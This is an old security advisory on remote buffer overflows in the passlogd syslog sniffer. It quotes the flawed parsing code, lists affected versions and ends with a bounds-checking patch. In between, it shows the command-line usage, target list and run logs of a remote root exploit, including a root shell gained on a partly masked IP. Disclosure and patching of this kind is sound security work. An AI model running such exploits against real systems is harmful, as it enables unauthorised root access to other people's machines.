======================================== INetCop Security Advisory #2003-0x82-015 ======================================== * Title: Remote Multiple Buffer Overflow vulnerability in passlogd sniffer. 0x01. Description About: passlogd(passive syslog capture daemon) is a purpose-built sniffer for capturing syslog messages in transit. This allows for backup logging to be performed on a machine with no open ports. This program is introduced in securityfocus: http://www.securityfocus.com/tools/2076 Vulnerability can presume as following. There is sl_parse() function to 33 lines of 'passlogd-0.1d/parse.c' code. __ 33 void sl_parse(char *user, struct pcap_pkthdr *pkthdr, u_char *pkt) 34 { ... 42 char level[5]; 43 char message[1024]; 44 char buffer[4096]; ... 77 while(pkt[i] != '>'){ 78 level[j] = pkt[i]; // First, buffer overflow happens. 79 i++; 80 j++; 81 } 82 i++; ... 87 while(pkt[i] != '\n' && pkt[i] != '\r' && i < (pkthdr->caplen - 1)){ 88 if(debug) 89 printf("at byte %d of %d\n", i, pkthdr->caplen - 1); 90 message[z] = pkt[i]; // Second, buffer overflow happens. 91 i++; 92 z++; 93 } ... 103 /* built the logstring */ 104 if(dflag){ 105 sprintf(buffer, "%s %s\n", srcip, message); // Very dangerous. 106 } 107 else { 108 sprintf(buffer, "%s to %s: <%s> %s\n", srcip, dstip, level, message) // Similarly, is dangerous. ; 109 } ... /* Role of original is like this. */ 123 syslev = atoi(level); 124 openlog("passlogd", 0, LOG_DAEMON); 125 syslog(syslev, "%s", buffer); -- Visual point that change flowing of this program, happen after overwrited stack variables. Of course, frame pointer overrun exists together. 0x02. Vulnerable Packages Vendor site: http://www.morphine.com/src/passlogd.html passlogd v0.1d -passlogd-0.1d.tar.gz +FreeBSD +OpenBSD +Linux +Other passlogd v0.1c -passlogd-0.1c.tar.gz passlogd v0.1b -passlogd-0.1b.tar.gz passlogd v0.1a -passlogd-0.1a.tar.gz 0x03. Exploit Our proof of concept code was completed. Exhibit it sooner or later. bash-2.04# ./0x82-Remote.passlogd_sniff.xpl passlogd sniffer remote buffer overflow root exploit by Xpl017Elz. Usage: ./0x82-Remote.passlogd_sniff.xpl -option [argument] -h - hostname. -f - spoof src ip. -s - &shellcode. -l - buf len. -t - target number. -i - help information. Select target number: {0} ALZZA Linux release 6.1 (Linux One) {1} WOW Linux release 6.2 (Puberty) {2} RedHat Linux release 7.0 (Guinness) {3} WOWLiNUX Release 7.1 (Paran) {4} RedHat Linux release 8.0 (Psyche) Example> ./0x82-Remote.passlogd_sniff.xpl -h localhost -f82.82.82.82 -t3 Example2> ./0x82-Remote.passlogd_sniff.xpl -h localhost -s0x82828282 -l582 bash-2.04# test exploit result: -- #1) attacker system: bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2 -s0x82828282 passlogd sniffer remote buffer overflow root exploit by Xpl017Elz. [0] Set packet code size. [1] Set protocol header. [2] Make shellcode. [3] Set rawsock. [4] Send packet. [5] Trying 61.37.xxx.xx:36864. [-] Connect Failed. bash-2.04# #2) target system: [root@blah /passlogd-0.1d]# gdb -q ./passlogd (gdb) r Starting program: /passlogd-0.1d/./passlogd Wed Mar 26 12:16:27 2003 to : < > r^) F @ F @ F N f C F f ^ F ) F f F N N N f ^ CC f V V fC ?) ?A ?A V v K /bin/shd Program received signal SIGSEGV, Segmentation fault. 0x82828282 in ?? () (gdb) real exploit result: -- bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2 passlogd sniffer remote buffer overflow root exploit by Xpl017Elz. [0] Set packet code size. [1] Set protocol header. [2] Make shellcode. [3] Set rawsock. [4] Send packet. [5] Trying 61.37.xxx.xx:36864. [*] Connected to 61.37.xxx.xx:36864. [*] Executed shell successfully ! Linux blah 2.4.20 #1 SMP Fri Mar 21 20:36:58 EST 2003 i686 unknown uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [root@blah /passlogd-0.1d]# -- 0x04. Patch === parse.patch === --- parse.c Sat Jun 9 14:07:45 2001 +++ parse.patch.c Wed Mar 26 11:48:33 2003 @@ -75,6 +75,10 @@ j=0; while(pkt[i] != '>'){ + if(j==sizeof(level)-1) + { + break; + } level[j] = pkt[i]; i++; j++; @@ -87,6 +91,10 @@ while(pkt[i] != '\n' && pkt[i] != '\r' && i < (pkthdr->caplen - 1)){ if(debug) printf("at byte %d of %d\n", i, pkthdr->caplen - 1); + if(z==sizeof(message)-1) + { + break; + } message[z] = pkt[i]; i++; z++; @@ -102,10 +110,10 @@ /* built the logstring */ if(dflag){ - sprintf(buffer, "%s %s\n", srcip, message); + snprintf(buffer, sizeof(buffer)-1, "%s %s\n", srcip, message); } else { - sprintf(buffer, "%s to %s: <%s> %s\n", srcip, dstip, level, message); + snprintf(buffer, sizeof(buffer)-1, "%s to %s: <%s> %s\n", srcip, dstip, level, message); } if(debug){ === eof === P.S: Sorry, for my poor english. -- By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security. MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com INetCop Security Home: http://www.inetcop.org (Korean hacking game) My World: http://x82.i21c.net & http://x82.inetcop.org GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y -- -- _______________________________________________ Get your free email from http://www.hackermail.com Powered by Outblaze
This archive was generated by hypermail 2b30 : Wed Apr 02 2003 - 11:27:40 PST